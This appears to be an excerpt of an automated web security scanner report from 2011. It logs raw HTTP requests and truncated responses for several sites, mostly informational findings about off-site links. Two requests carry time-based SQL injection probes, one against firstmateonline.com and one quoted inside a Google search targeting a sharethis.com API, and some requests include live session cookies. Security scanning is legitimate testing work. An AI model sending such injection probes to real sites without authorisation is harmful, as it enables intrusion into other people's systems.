Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.231.42
X-Cnection: close
Date: Sat, 07 May 2011 01:50:43 GMT
Content-Length: 16849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/SCMag" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187868_22922069230_938611_q.jpg" alt="SC Magazine" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000172966083" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161261_100000172966083_7540101_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/nazmir.household" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186124_100001076074436_2123862_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1296612869" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49305_1296612869_5528_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000314061378" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49212_100000314061378_5552_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/valeriasandi014" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211516_1108592382_2430011_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/griffon.chiu" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/173185_1669922158_6640289_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/mozart.malik" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186269_785504229_3924533_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174521_526446573_1919545_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174377_563116089_7292770_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/bahaa.othman" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202929_100000160973300_2502605_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187181_1154833703_5571024_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/RockyTheWonderGeek" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49868_1820501128_2748_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000391000833" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/70767_100000391000833_3455439_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000688536440" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203383_100000688536440_7342723_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=551486683" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49311_551486683_7168_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/eva.fauzia1" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174520_100001832854145_1877714_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/minawi" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195481_683993363_1489494_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=647065265" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203068_647065265_5097175_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/173425_728607904_3846809_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/briganski" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211898_1126195375_904923_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1709428032" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186165_1709428032_1441755_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=768728547" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195517_768728547_278844_q.jpg" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...
24.66. http://www.firehost.com/secure-hosting/pci  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firehost.com
Path:   /secure-hosting/pci

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /secure-hosting/pci?_kk=PCI%20compliance%20scanning&_kt=538c084f-5d5b-43c7-83f9-c71a7300c9e6&gclid=CLyMisrV1KgCFQNx5Qodz0X8fA HTTP/1.1
Host: www.firehost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 20:16:53 GMT
Content-Length: 31607


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us">
<head>
   <meta http-equiv="C
...[SNIP]...
<meta name="copyright" content="&copy;2011 FireHost, Inc." />
   <link rel="stylesheet" href="//ne.wac.edgecastcdn.net/001415/assets/css/firehost.css" type="text/css" media="screen" />
   <link rel="stylesheet" href="//ne.wac.edgecastcdn.net/001415/assets/css/print.css" type="text/css" media="print" />
   <link rel="home" href="http://www.firehost.com/" />
   <link rel="shortcut icon" href="//ne.wac.edgecastcdn.net/001415/assets/favicon.ico" type="image/x-icon" />
   <script type="text/javascript" src="/scripts/protoaculous.1.8.1.min.js"></script>
   <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<link href="//ne.wac.edgecastcdn.net/001415/assets/css/prettyPhoto.css" type="text/css" rel="stylesheet" />
<style type="text/css">
...[SNIP]...
</p>
<img src="//ne.wac.edgecastcdn.net/001415/assets/images/pci/main_gadget_pci.png" width="187" height="134" alt=""
style="float: right; display: block; width: 187px; margin-top: -22px;" />
<div style="clear: both; height: 6px;">
...[SNIP]...
<span class="dotbridge-pci"><a class="video-clip" href="http://app.wistia.com/embed/medias/b54268d8f2?width=640&height=360&autoplay=true&playbutton=true&controls_visible=false&end_video_behavior=default&iframe=true"
rel="nofollow prettyPhoto[iframes]"><span style="opacity: 1;">
...[SNIP]...
When you...re selling online, you collect a lot of personal information that can...t
fall into the wrong hands.
<img src="//ne.wac.edgecastcdn.net/001415/assets/images/managed/quotes_closed.png" alt="" /></div>
...[SNIP]...
</em>&nbsp;<img src="//ne.wac.edgecastcdn.net/001415/assets/images/pci/dotbridge_logo.png"
alt="dotbridge" style="margin-bottom: -5px; border: 0;" /> <a target="_blank"
class="cs-downarrow press topo-download" href="//ne.wac.edgecastcdn.net/001415/assets/downloads/FireHost_PCI_Topology.pdf">
<span>
...[SNIP]...
<a href="/why/testimonials">
<img src="//ne.wac.edgecastcdn.net/001415/assets/images/pci/customer-bar-ecomm.png" alt="" style="margin-bottom: 18px;
border: 0;" /></a>
...[SNIP]...
</a> <img src="//ne.wac.edgecastcdn.net/001415/assets/images/layout/list_arrow.gif" width="5" height="6" alt="" /> <a href="/secure-hosting">
...[SNIP]...
</a> <img src="//ne.wac.edgecastcdn.net/001415/assets/images/layout/list_arrow.gif" width="5" height="6" alt="" /> <a href="/secure-hosting/advanced-configurations">
...[SNIP]...
</a> <img src="//ne.wac.edgecastcdn.net/001415/assets/images/layout/list_arrow.gif" width="5" height="6" alt="" /> <a href="/secure-hosting/pci" class="selected">
...[SNIP]...
<li><a href="http://www.fireblog.com/" >FireBlog</a>
...[SNIP]...
<div id="partner-links">
<a class="first-partner-logo" target="_blank" href="//privacy-policy.truste.com/click-with-confidence/ctv/en/www.firehost.com" rel="nofollow">
<img src="//ne.wac.edgecastcdn.net/001415/assets/images/partners/logo-truste.png" width="101" height="28" alt="Truste" /></a>
<a target="_blank" href="//privacy-policy.truste.com/click-with-confidence/eusafe/en/www.firehost.com" rel="nofollow">
<img src="//ne.wac.edgecastcdn.net/001415/assets/images/partners/logo-sh.png" width="85" height="28" alt="US-EU Safe Harbor" /></a>
<a target="_blank" href="https://www.pcisecuritystandards.org/participation/member_list.html?group=2&region=1&perpage=0" rel="nofollow" class="adjust-logo">
<img src="//ne.wac.edgecastcdn.net/001415/assets/images/partners/logo-pci.png" width="77" height="48" alt="PCI" /></a>
...[SNIP]...
<div id="footer-social">
<a href="http://www.twitter.com/firehost" target="_blank" class="twitter">Twitter</a>
<a href="http://www.facebook.com/pages/FireHost-Inc/57883784390" target="_blank" class="facebook" rel="nofollow">Facebook</a>
<a href="http://www.linkedin.com/companies/333863" target="_blank" class="linkedin">LinkedIn</a>
...[SNIP]...
<div id="hiddenlogo"><img src="//ne.wac.edgecastcdn.net/001415/assets/images/layout/printLogo.gif" width="253" height="61" alt="Managed Cloud Hosting" /></div>
...[SNIP]...
</span>Secure Cloud Hosting <img src="//ne.wac.edgecastcdn.net/001415/assets/images/layout/blackArrow.gif"></a></div>

                   <div class="lower-nav-section">
                       <img src="//ne.wac.edgecastcdn.net/001415/assets/images/layout/cloudNav_features.png" style="margin-bottom:10px;"/>
   
                       <a href="/secure-hosting/configure" rel="nofollow" class="btn-configure-sub-nav">
...[SNIP]...
<a href="/secure-hosting/compliant/pci">PCI 2.0 <img src="//ne.wac.edgecastcdn.net/001415/assets/images/layout/blackArrow.gif"><span>
...[SNIP]...
<a href="/secure-hosting/compliant/hipaa">HIPAA <img src="//ne.wac.edgecastcdn.net/001415/assets/images/layout/blackArrow.gif"><span>
...[SNIP]...
</span>Customer Case Studies <img src="//ne.wac.edgecastcdn.net/001415/assets/images/layout/blackArrow.gif"></a>
...[SNIP]...
</span>FireHost In The News <img src="//ne.wac.edgecastcdn.net/001415/assets/images/layout/blackArrow.gif"></a>
...[SNIP]...
<div id="hidden-content">
   <a href="http://www.getfirefox.com" target="_blank" rel="nofollow"></a>
   <a href="http://www.google.com/chrome" target="_blank" class="chrome" rel="nofollow"></a>
   <a href="http://windows.microsoft.com/en-US/internet-explorer/downloads/ie-9/worldwide-languages" target="_blank" class="explorer" rel="nofollow"></a>
   <a href="http://www.opera.com/download/" target="_blank" class="opera" rel="nofollow"></a>
   <a href="http://www.apple.com/safari/download/" target="_blank" rel="nofollow"></a>
...[SNIP]...
</div>
   
   
<script type="text/javascript" src="https://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8550.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1070200079/?label=1IP6CJvekQIQj-qn_gM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...
<a id="chat-proactive-accept" href="#"><img src="//ne.wac.edgecastcdn.net/001415/assets/images/activa/chat-invite-top.gif" alt="Begin a Chat" style="display:block;" /></a>
       <a id="chat-proactive-reject" href="#"><img src="//ne.wac.edgecastcdn.net/001415/assets/images/activa/chat-invite-bottom.gif" alt="No Thanks" style="display:block;" /></a>
...[SNIP]...
<a id="chat-automated-accept" href="#"><img src="//ne.wac.edgecastcdn.net/001415/assets/images/activa/chat-invite-top.gif" alt="Begin a Chat" style="display:block;" /></a>
       <a id="chat-automated-reject" href="#"><img src="//ne.wac.edgecastcdn.net/001415/assets/images/activa/chat-invite-bottom.gif" alt="No Thanks" style="display:block;" /></a>
...[SNIP]...
</span>
   <img id="ss_img" src="//seal.globalsign.com/SiteSeal/images/gs_noscript_130-65_en.gif" />
   <script type="text/javascript" src="//seal.globalsign.com/SiteSeal/gs_image_130-65_en.js" defer></script>
</div>


               <img src="http://ad.retargeter.com/seg?add=54001&t=2" width="1" height="1" />
   

<script type="text/javascript">
...[SNIP]...
24.67. http://www.firstmateonline.com/businessinfo.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstmateonline.com
Path:   /businessinfo.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /businessinfo.php?location=17044%20or%20%28sleep%284%29%2b1%29%20limit%201%20--%20&sponsor=8159 HTTP/1.1
Cookie: fancyform=d9c8713861eb02680a2466c6a2547880; PHPSESSID=1efaeee0b0a2648e13c04a21839ee72b; zZ=a0
Host: www.firstmateonline.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 02:24:29 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 15762

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/templates/fmHaloLeftNav002.dwt" codeOutsideHTMLIsLocked="fals
...[SNIP]...
</form>

<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
<div id="globalNav">
<img alt="" src="http://www.allatsea.net/assets/gblnav_left.gif" height="32" width="4" id="gnl"> <img alt="" src="http://www.allatsea.net/assets/glbnav_right.gif" height="32" width="4" id="gnr">
<div id="globalLink">
...[SNIP]...
</a>
    <a href="http://www.forcrew.com/" class="glink">ForCrew.com</a>
    <a href="http://www.allatsea.net/" class="glink">All At Sea</a>
    <a href="http://www.crew-life.com" class="glink">Crew Life</a>
    <a href="http://www.yachtessentials.com/" class="glink">YACHT ESSENTIALS</a>
...[SNIP]...
<!--pagecell1-->
<img alt="" src="http://www.allatsea.net/assets/tl_curve_white.gif" height="6" width="6" id="tl"> <img alt="" src=                    "http://www.allatsea.net/assets/tr_curve_white.gif" height="6" width="6" id="tr">
<div id="translate">
...[SNIP]...
<noscript><a href='http://new.forcrew.com/admanager/www/delivery/ck.php?n=af9653b3&amp;cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://new.forcrew.com/admanager/www/delivery/avw.php?zoneid=7&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;n=af9653b3' border='0' alt='' /></a>
...[SNIP]...
<noscript><a href='http://new.forcrew.com/admanager/www/delivery/ck.php?n=ad85359b&amp;cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://new.forcrew.com/admanager/www/delivery/avw.php?zoneid=10&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;n=ad85359b' border='0' alt='' /></a>
...[SNIP]...
<div id="advert"> <a href="http://www.forcrew.com/"onClick="javascript:urchinTracker('/outgoing/crewlife');"target="_blank"><img src="assets/ads/160x294-forcrew.gif" alt="ForCrew.com Connecting Captains and Crew" width="160" height="294" border="0">
...[SNIP]...
</em> <a href="http://www.budgetmarine.com">http://www.budgetmarine.com</a>
...[SNIP]...
<noscript><a href='http://new.forcrew.com/admanager/www/delivery/ck.php?n=a05fbc3a&amp;cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://new.forcrew.com/admanager/www/delivery/avw.php?zoneid=9&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;n=a05fbc3a' border='0' alt='' /></a>
...[SNIP]...
<div id="siteInfo">
   <a href="http://www.allatsea.net/index.php"><img src="assets/allatsea_sm_logo.gif" alt="All At Sea - The Caribbean's Waterfront Magazine. Serving the Caribbean Maritime Industry since 1993." width="60" height="44" border="0"></a>
    <a href="http://www.allatsea.net/aboutus.htm">About Us</a>
...[SNIP]...
24.68. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Jolly+Harbour+PO+Box+2077+Saint+John's HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=46=OWH5Day_z-dvNKz2zUPZ66bscqIQiXCwXcDUm788v-iY-VVDvGxPmnsbAFwU7P_idDvVtkqQwa_yvFS_xH-pHPbTamh5YBpBZYNPycAcjuWO2VSpk71uhgayNx6KcbrM; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:05:55 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/vD843DpA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 84033

<!doctype html> <head> <title>Jolly Harbour PO Box 2077 Saint John's - Google Search</title> <script>window.google={kEI:"s2LETeysO86tgQeMtanLBA",kEXPI:"17259,24472,25907,27147,28505,28514,28554
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=Jolly+Harbour+PO+Box+2077+Saint+John%27s&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.yachtworld.com/paradiseboatsales/paradiseboatsales_0.html" class=l onmousedown="return clk(this.href,'','','','1','','0CCUQFjAA')">Paradise Boat Sales, Inc. (<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:R-zqPHrU_pkJ:www.yachtworld.com/paradiseboatsales/paradiseboatsales_0.html+Jolly+Harbour+PO+Box+2077+Saint+John&#39;s&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCoQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.yachtworld.com/core/byp/search_byp.jsp?country=109&amp;countryhiddenvalue=109&amp;countryhiddentext=&amp;startPagination=0&amp;10000" class=l onmousedown="return clk(this.href,'','','','2','','0CCsQFjAB')">Search for a local marine-related business on YachtWorld.com</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:iqgtOjS8jaQJ:www.yachtworld.com/core/byp/search_byp.jsp%3Fcountry%3D109%26countryhiddenvalue%3D109%26countryhiddentext%3D%26startPagination%3D0%2610000+Jolly+Harbour+PO+Box+2077+Saint+John&#39;s&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:iqgtOjS8jaQJ:www.yachtworld.com/core/byp/search_byp.jsp%3Fcountry%3D109%26countryhiddenvalue%3D109%26countryhiddentext%3D%26startPagination%3D0%2610000+Jolly+Harbour+PO+Box+2077+Saint+John\'s&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com','','','','2','','0CDAQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.yachtworld.com/boats/2002/Carrera-Carrera-2168750/St.-John&#39;s/Antigua-%26-Barbuda" class=l onmousedown="return clk('http://www.yachtworld.com/boats/2002/Carrera-Carrera-2168750/St.-John\'s/Antigua-%26-Barbuda','','','','3','','0CDEQFjAC')">2002 Carrera Carrera Power Boat For Sale - www.yachtworld.com</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:JlPZr-XtvJYJ:www.yachtworld.com/boats/2002/Carrera-Carrera-2168750/St.-John&#39;s/Antigua-%2526-Barbuda+Jolly+Harbour+PO+Box+2077+Saint+John&#39;s&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:JlPZr-XtvJYJ:www.yachtworld.com/boats/2002/Carrera-Carrera-2168750/St.-John\'s/Antigua-%2526-Barbuda+Jolly+Harbour+PO+Box+2077+Saint+John\'s&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com','','','','3','','0CDYQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.yachtworld.com/boats/2001/Boston-Whaler-13-Sport-2299658/St.-John&#39;s/Antigua-%26-Barbuda" class=l onmousedown="return clk('http://www.yachtworld.com/boats/2001/Boston-Whaler-13-Sport-2299658/St.-John\'s/Antigua-%26-Barbuda','','','','4','','0CDcQFjAD')">2001 Boston Whaler 13 Sport Power Boat For Sale - www.yachtworld.com</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ZvFB22ZB6o0J:www.yachtworld.com/boats/2001/Boston-Whaler-13-Sport-2299658/St.-John&#39;s/Antigua-%2526-Barbuda+Jolly+Harbour+PO+Box+2077+Saint+John&#39;s&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:ZvFB22ZB6o0J:www.yachtworld.com/boats/2001/Boston-Whaler-13-Sport-2299658/St.-John\'s/Antigua-%2526-Barbuda+Jolly+Harbour+PO+Box+2077+Saint+John\'s&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com','','','','4','','0CDwQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://bahiaredonda.com/ip/brokers.php" class=l onmousedown="return clk(this.href,'','','','5','','0CD4QFjAE')">Caribbean Information: Yacht Sales and Brokers</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:rgFw1Ez6zp8J:bahiaredonda.com/ip/brokers.php+Jolly+Harbour+PO+Box+2077+Saint+John&#39;s&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CEMQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://sunseekerpredator.com/predator-yachts-for-sale-new-used/page/2/" class=l onmousedown="return clk(this.href,'','','','6','','0CEYQFjAF')">Sunseeker Predator Yachts for Sale, New and Used Sunseeker <b>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:zmzZq3l-7FYJ:sunseekerpredator.com/predator-yachts-for-sale-new-used/page/2/+Jolly+Harbour+PO+Box+2077+Saint+John&#39;s&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CEsQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.yachtbazaar.com/Paradise/yachts.asp?type=P" class=l onmousedown="return clk(this.href,'','','','7','','0CEwQFjAG')">Paradise Boat Sales, Inc. - Power Yachts</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:JSn3o2PGnp4J:www.yachtbazaar.com/Paradise/yachts.asp%3Ftype%3DP+Jolly+Harbour+PO+Box+2077+Saint+John&#39;s&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:JSn3o2PGnp4J:www.yachtbazaar.com/Paradise/yachts.asp%3Ftype%3DP+Jolly+Harbour+PO+Box+2077+Saint+John\'s&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com','','','','7','','0CFEQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.washingtonmarine.com/core/byp/search_byp.jsp?country=109&amp;subcategory=211&amp;startPagination=0&amp;10000" class=l onmousedown="return clk(this.href,'','','','8','','0CFIQFjAH')">Search for a local marine-related business on YachtWorld.com</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ZKja1eNjO2EJ:www.washingtonmarine.com/core/byp/search_byp.jsp%3Fcountry%3D109%26subcategory%3D211%26startPagination%3D0%2610000+Jolly+Harbour+PO+Box+2077+Saint+John&#39;s&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:ZKja1eNjO2EJ:www.washingtonmarine.com/core/byp/search_byp.jsp%3Fcountry%3D109%26subcategory%3D211%26startPagination%3D0%2610000+Jolly+Harbour+PO+Box+2077+Saint+John\'s&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com','','','','8','','0CFcQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.marine-world.com/brokers/browse?order=country&amp;sort=asc" class=l onmousedown="return clk(this.href,'','','','9','','0CFgQFjAI')">first - Boat and Yacht Brokers Locator</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:2XQBi19WCScJ:www.marine-world.com/brokers/browse%3Forder%3Dcountry%26sort%3Dasc+Jolly+Harbour+PO+Box+2077+Saint+John&#39;s&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:2XQBi19WCScJ:www.marine-world.com/brokers/browse%3Forder%3Dcountry%26sort%3Dasc+Jolly+Harbour+PO+Box+2077+Saint+John\'s&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com','','','','9','','0CF0QIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.yellowpages-caribbean.com/result.cfm/Antigua+And+Barbuda/category/Horse+-riding+academies-/" class=l onmousedown="return clk(this.href,'','','','10','','0CF4QFjAJ')">, Antigua And Barbuda / Yellowpages-Caribbean.com</a>
...[SNIP]...
24.69. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=GET+%2Fapi%2FgetApi.php%3Freturn%3Djson%26cb%3DgetPubGA_onSuccess%26service%3DgetPublisherDomains%26publisher%3D-111%2527%2520OR%2520SLEEP(25)%3D0%2520LIMIT%25201--%2B+HTTP%2F1.1User-Agent%3A+Mozilla%2F4.0+(compatible%3B+MSIE+6.0%3B+Windows+NT+5.1%3B+SV1%3B+.NET+CLR+1.1.4322)Cache-Control%3A+no-cacheHost%3A+wd.sharethis.comAccept-Encoding%3A+gzip%2C+deflate HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
